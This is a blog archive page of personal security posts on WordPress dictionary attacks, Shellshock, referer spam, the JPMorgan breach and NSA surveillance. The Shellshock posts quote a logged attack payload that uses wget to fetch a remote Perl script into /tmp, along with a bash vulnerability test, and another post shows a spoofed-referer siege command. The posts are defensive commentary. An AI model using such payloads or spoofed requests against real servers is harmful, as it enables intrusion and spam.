Another WordPress Attack

Your JoeDog was viewing his usage stats this morning and … well, see if anything stands out:

daily_usage_201410

There was a 94% increase in traffic yesterday. Was your JoeDog slashdotted? There was no hint that slashdot or any other site sent additional viewers this way. The vast majority of traffic arrived by direct request. “What does that mean, a direct request?” It means somebody typed “www.joedog.org” in the URL field of their browser. “So eighty-one thousand people decided to type “www.joedog.org” in their browsers? That seems unlikely.” That’s what Your JoeDog thought.

The usage report revealed another interesting fact. Eighty-one thousand requests were made from a single IP address: 173.245.50.137. The next most active IP address made 97% fewer requests. That’s interesting. Let’s see was Mr. 173.245.50.137 was doing on this site, shall we?

$ egrep 173.245.50.137 joedog-access_log
173.245.50.137 - - [04/Oct/2014:17:59:48 -0400] "POST /wp-login.php HTTP/1.1" 403 214 "-" "-"
173.245.50.137 - - [04/Oct/2014:17:59:48 -0400] "POST /wp-login.php HTTP/1.1" 403 214 "-" "-"
173.245.50.137 - - [04/Oct/2014:17:59:48 -0400] "POST /wp-login.php HTTP/1.1" 403 214 "-" "-"

He — you know it was a he — was making POST requests to the WordPress login page.  In other words, he was running a dictionary attack against the site. This attack persisted for four hours. For each of those requests, apache responded with HTTP-403. “What does HTTP-403 mean?” It means “Forbidden.” Thanks to a dictionary attack defense Your JoeDog documented in June 2013, the attacker never reached the login page. He was thwarted by an apache rule.

Why did a futile attack persist so long?

It was probably launched by malware on a zombie computer. Given the expected number of failures, the program was probably designed to report successes, not denials. So even though its assault was futile, the zombie diligently ran through its entire list of credentials.

When this happens to you — and it will happen to you, don’t get too upset. It’s not personal. These guys are running these attacks on any site they can find. Your site just happened to be in IPv4 address space.

[JoeDog: How To Stop A WordPress Dictionary Attack]

 

 

Posted in Security | Leave a comment



The Cyberattack on JPMorgan Chase

From today’s New York Times:

“It was a huge surprise that they were able to compromise a huge bank like JPMorgan,” said Al Pascual, a security analyst with Javelin Strategy and Research. “It scared the pants off many people.”

Honestly, this is only surprising to people who don’t work in large organizations. Large companies are filled with aging hardware kept alive beyond lifecycle. These servers host applications that are too important to kill but not important enough to port to newer architecture. Your JoeDog has seen servers that nobody owns. “What’s that do?” I don’t know. The guy who administered it retired five years ago.

The easiest way to circumvent millions of dollars in network security devices is with malware. Let’s say — and why not? — there’s a 0.001 chance that somebody falls for malware click bait. If your company has 100 employees, chances are less that 1 you’ll be malwared. But in a company of 10,000 people, ten mother fsckers are going to click that link.

Large corporations have been instrumental in driving down programming costs. While they may have a few senior developers on staff, most of the grunt work takes place overseas. Now Your JoeDog is not disparaging overseas developers. There are many fine programmers the world over. And the good ones all cost the same: lots o’ money. Large corporations don’t want those guys. They can find them in the US. They want cheap ones.

True story: Your JoeDog was kept abreast of the details of an outsourcing operation. When the initial quotes came back from India, there was much surprise. “This isn’t going to work, you guys cost more than our own people.” Well, the Indians said, we have another team in Bumfsck, India. They cost one-fifth as much as the Bangalore team. “Really? We’ll take it.”

The breach at JPMorgan Chase came in through the web servers. We don’t know where that was coded but Your JoeDog has his hunch. At some point a decision maker at JPMorgan was quoted the cost of Bumfsck coders and said, “Really? We’ll take it.”

 

 

 

Posted in Security | Leave a comment



Referer Spammers

The Internets are full of spam. Maybe you’ve noticed?

It’s in your inbox, in your comments and scattered throughout your web forums. Every spammer is a bag of dicks but the worst bottom feeder on the Internets is the referer spammer.

If you’ve never administered a website, then you’ve probably never heard of referer spam. Yeah, what is that?  Glad you asked. These dregs send requests to your web site with a fabricated referer that points to a site they want to advertise. Ideally, they’ll send requests to a site that publishes its traffic reports. When their URL makes the report, they get a free link back to their site.

Sites that publish their usage reports are easy to find. Put this in the Google Machine and see what pops up: “Top * Total Search Strings” This is what we’re looking for: Usage Stats: Top Referers.  Your JoeDog can get himself on that report by doing this:

Bully $ siege -H "Referer: http://www.joedog.org/" -g http://www.pickart.at/
HEAD / HTTP/1.0
Host: www.pickart.at
Accept: */*
User-Agent: Mozilla/5.0 (unknown-x86_64-linux-gnu) Siege/3.0.8
Referer: http://www.joedog.org/
Connection: close
HTTP/1.1 200 OK
Date: Fri, 03 Oct 2014 17:53:38 GMT
Server: Apache
Connection: close
Content-Type: text/html

Now if he’s really intent on making that report, he’ll repeat that request a few hundred times and place himself at number two on the chart. But here’s the thing: Referer Spammers will spam your logs even if you don’t publish your reports. They’ll go to all that trouble just to lure webmasters to their esoteric fetish sites.

So what can you do to prevent this stuff? Mostly you can decrease their incentive.

  1. Put your usage stats inside a password protected area
  2. Add a robots.txt with a bot exclusion rule so search engines don’t index it.
  3. Add a nofollow directive inside every link, again so engines don’t index them

I guarantee you’ll still get the stuff. They’ll send faked referrals just to capture the attention of the site’s administrators but at least you won’t award them with a boost to their Page Rank.

NOTE: Yes, Your JoeDog spelled Referrer with only two r’s. Most humans use three. Phillip Hallam-Baker is not most humans. He was the first guy to miss an ‘r’ in the original HTTP specification. I say, “first guy” because hundreds of eyeballs viewed that document and none of them noticed the misspelling. By the time it became RFC1945, “Referer” was set in stone. It would have been easier to change the world’s English-language dictionaries at that point….

Posted in Apache, Applications, Security | Leave a comment



So Are You Vulnerable To Shell-shock?

Here’s a quick command line test to see if you’re vulnerable to shell-shock, the bash vulnerability that everyone — I mean everyone — is talking about:

$ env x='() { :;}; echo 1. env' bash -c "echo 2. bash"

If your bash is vulnerable, it will execute the echo command inside the environment, if it’s not vulnerable, then it will only execute the stuff after -c

A vulnerable system prints this:

$ env x='() { :;}; echo 1. env' bash -c "echo 2. bash"
1. env
2. bash

A non-vulnerable system prints this:

$ env x='() { :;}; echo 1. env' bash -c "echo 2. bash"
2. bash

On the vulnerable system, the echo command that is set in the environment is executed by bash when the shell is invoked:

env x='() { :;}; echo 1. env' bash -c "echo 2. bash"

The stuff in red should NOT be executed. That’s a bug; it needs to be fixed.

NOTE: The second command was run on the server that hosts this blog entry. You guys can quit trying, mmmkay?

 

Posted in Applications, Security, sh | Leave a comment



Incoming!!

I don’t know about you, but Your JoeDog is shell shocked. His logs are filled with stuff like this:

173.245.53.136 – – [25/Sep/2014:16:42:37 -0400] “GET /cgi-sys/defaultwebpage.cgi HTTP/1.1″ 301 – “-” “() { :;}; /bin/bash -c \”/usr/bin/wget http://singlesaints.com/firefile/temp?h=joedog.org -O /tmp/a.pl\””

So what’s happening here? Basically, some asshole is trying to exploit last week’s widely publicized bash shell vulnerability to invoke wget and pull down a perl script named “a.pl”

First of all, Your JoeDog hates scripts with an extension to designate the language in which they were coded. The person running the script doesn’t care what language it runs under. The computer will read the sh-bang line (#!/bin/perl) and call the appropriate interpreter. What’s the point of adding .pl? When you attack JoeDog’s computers please do so without a file extension, mmmmkay?

Second of all, he’s not going to find wget. On Your JoeDog’s computer it was installed in /bin/wget. But don’t bother trying to invoke it from there either. In accordance with best practice, it was moved it to a non-standard location. (You should do that, too.)

So while many of us are annoyed with this vulnerability, security firms and tech news companies are peeing themselves with excitement.

Dice tells us about ThreatStream, a cyber intelligence firm who’ve released ShockPot, a shell-shock honey pot. You can set it up on an publicly accessible server and watch knuckleheads try to ‘sploit you. Sounds like somebody needs a hobby.

Dice downloaded the software package and set it up on Linode, a Linux hosting site. Within a few days, they were shell-shocked seven times. Instead of wasting their time with honey pots, they could come over here and tail Your JoeDog’s logs. He was attacked 18 times in the last eight hours.

NOTE: The script they tried to pull was hosted on singlesaints.com, a Mormon dating site located in Utah. Your JoeDog attempted to snag that file for examination and they blocked his request.

HTTP request sent, awaiting response... 403 Forbidden

Props to all the single Mormon nerds who helped fix that issue in a timely fashion.

 

 

Posted in Community, Security | Leave a comment



How To Stop A WordPress Dictionary Attack

You guys! Lest we forget, Your Joe Dog was under attack!

Apparently there’s a widespread dictionary attack that uses tens of thousands of malwared computers to attack WordPress sites. Your JoeDog uses WordPress as a CMS. Your JoeDog was attacked!

The extent of the attack was not initially clear. I was alerted by sluggish performance. I noticed a lot of POSTs to wp-login.php. Those POSTs appeared in the access log like this:

92.47.65.37 - - [17/Jun/2013:09:06:42 -0400] "POST /wp-login.php HTTP/1.0" 
200 3444 "-" "Mozilla/5.0 (Windows NT 6.1; rv:19.0) Gecko/2010 Firefox/19.0"

I have a script that allows me to quickly block IP addresses with iptables. So I started harvesting addresses and blocking them. Done and done.

Except the attacker seemed to have an endless supply of IP addresses. The attack persisted no matter how many addresses I blocked.

Take a look at the log entry above. The referer field is empty. A JoeDog Fellow suggested I block all POSTs that don’t include a referer. Afterall, you don’t POST out of the blue – you submit a form in your browser. I blocked those types of requests with a simple mod_rewrite rule:

 RewriteCond %{REQUEST_METHOD} =POST
 RewriteCond %{HTTP_REFERER} ^-?$
 RewriteRule ^/(wp-login.php|wp-admin) - [F,NS,L]

Done and done. Amiright? Sadly, no….

Continue reading “How To Stop A WordPress Dictionary Attack” »

Posted in Security, Wordpress | 4 Comments



Your Joe Dog Is Under Attack

Wanted: Kevin MitnickThis site has been under attack for several weeks now. The attacker is using an unthrottled brute force dictionary attack. He seems to have an unlimited supply of IP addresses. After examining some of the source addresses, I’ve concluded that we’re on the wrong end of a bot net.

I’ve been harvesting IP addresses and blocking them as fast as I can. I’ve also added Rewrite rules to deny these attempts based on his request signature. Those rules reduce overhead since his requests won’t generate database transactions. Yet no matter how many timeouts he gets and no matter how many Access Denied responses he endures, the attacks persist.

Because this dictionary attack is unthrottled, the affect is, at times, not unlike a DOS attack. Your Joe Dog is a public service with shallow pockets. We simply don’t have the resources to eat these attacks and provide you with snappy service. Bare with us as we deal with this asshole.

UPDATE: While it provides additional inconvenience, I applied an access control to the page he’s attacking. You can protect a single file inside a FilesMatch block like this:

 <FilesMatch "wp-login.php">
   AuthType Basic
   AuthName "Kiss my fscking ass"
   AuthUserFile /path/to/my/file
   Require user franklindelanoroosevelt
 </FilesMatch>

Obviously, some of that information was obfuscated but “Kiss my fscking ass” really is the realm I’m using.

The benefit to this approach is two-fold: 1. Apache doesn’t expend much effort to say, “401 gimme a password!” 2. If this layer is cracked, he still has to bust the next one before I reset the password on the first one….

 

Posted in Security, Wordpress | 1 Comment



Digging His Grave

“He’s digging his own grave with a very large spade.”

– Kevin Egan, an extradition attorney, on the revelation that Edward Snowden divulged NSA hacking activity inside China.

Posted in Security | Leave a comment



Mountains of NSA Data

Get SmartLast week the Guardian broke the news about Prism, an NSA data mining project in which the security agency harvests transaction records with the cooperation of private telecoms and internet companies. While it’s illegal to eavesdrop without a warrant, the NSA is harvesting conversational meta-data: calling records, email transactions and credit card swipes. This is basically the stuff you’d find in server logs.

The news was greeted with simultaneous outrage and indifference. Some were tremendously bothered by the news while others shrugged and said “meh.” Your Joe Dog’s congressman emailed to say he was greatly bothered by the news. Really? Then why didn’t you email constituents after any one of the thirteen briefings you had on the subject?

Five years ago, the NSA was probably incapable of doing much with all the data it collected. Just managing its information would have been a full time job. Since it began its surveillance programs, the NSA has brought up a series of large data centers to warehouse its records. The biggest, its Death Star, was constructed at Camp Williams, Utah.

The agency also improved its ability to effectively use this information. As the New York Times reports, NSA is working with Silicon Valley big data experts to efficiently sift through its transaction records. Its algorithms search for patterns and alert human agents when they match the hallmarks of terrorist activity.

And this is where it gets eerie.

From a study published in Nature, we learn that just four points of phone data are necessary to pinpoint the caller’s location with 95% accuracy. The average person leaves many breadcrumbs that reveal his whereabouts: cell phone data, EZ-Pass transactions, credit card purchases, ATM transactions, etc. Using information from cell towers, the agency can pinpoint your altitude right to the floor you’re sitting on at this moment. (I’ll save you some trouble: I’m currently on the third).

If you’d prefer to keep your location a secret, then, yes, this program is a concern. Unfortunately, it appears to be perfectly legal. You can have modern conveniences like cell phones, EZ-Pass, credit and debit cards or privacy. Pick one.

 

 

Posted in Security | Leave a comment



The Chinese Military Is Hacking US Infrastructure

chicoms

The New York Times reports that a large percentage of Chinese cyber attacks on American targets originate from inside a same small neighborhood that features a Chinese army headquarters building. The headquarters, a large white office tower in Shanghai, is surrounded by restaurants, massage parlors and a wine importer. It is the only structure in the neighborhood capable of housing a large number of sophisticated cyber attackers. This all but confirms the Chinese army is behind the American attacks.

The hackers, known in the US as the Comment Crew, were traced to Shanghai by Mandiant, a US security firm hired by the NY Times. The New York paper hired Mandiant to end infiltration of its network last year. The Virginia firm traced that attack and hundreds like it to the Shanghai neighborhood that houses the base, known as P.L.A. Unit 61398.

The firm were not able to confirm the attacks originated inside the building but the probability is very high.

“Either they are coming from inside Unit 61398,” said Kevin Mandia, the founder and chief executive of Mandiant, in an interview last week, “or the people who run the most-controlled, most-monitored Internet networks in the world are clueless about thousands of people generating attacks from this one neighborhood.”

Sure, it’s possible that an enterprise scale hacking effort led by mainland Chinese with direct access to Shanghai telecom infrastructure has setup shop inside one of the restaurants by Unit 61398. Now that they’ve been exposed we’ll just wait for the Chinese government to shut them down. That should happen any minute now. Yep … any … minute … now. Who are we kidding? The Chinese are attacking us!!

Posted in Security | Leave a comment



Recent Comments

  • Tim: For those who enjoy playing at home and are extra OCD … they’ll spot something wrong with this....
  • roshni: Hi jeff, I need your help regarding running urls in a file containing post directives. Could you please send...
  • Alle: In seige, what does the pink result mean?
  • Windows User: Nice collection of Perl modules. Thanks for sharing.
  • Jeff Fulmer: No idea. What do you see in the webserver’s logs?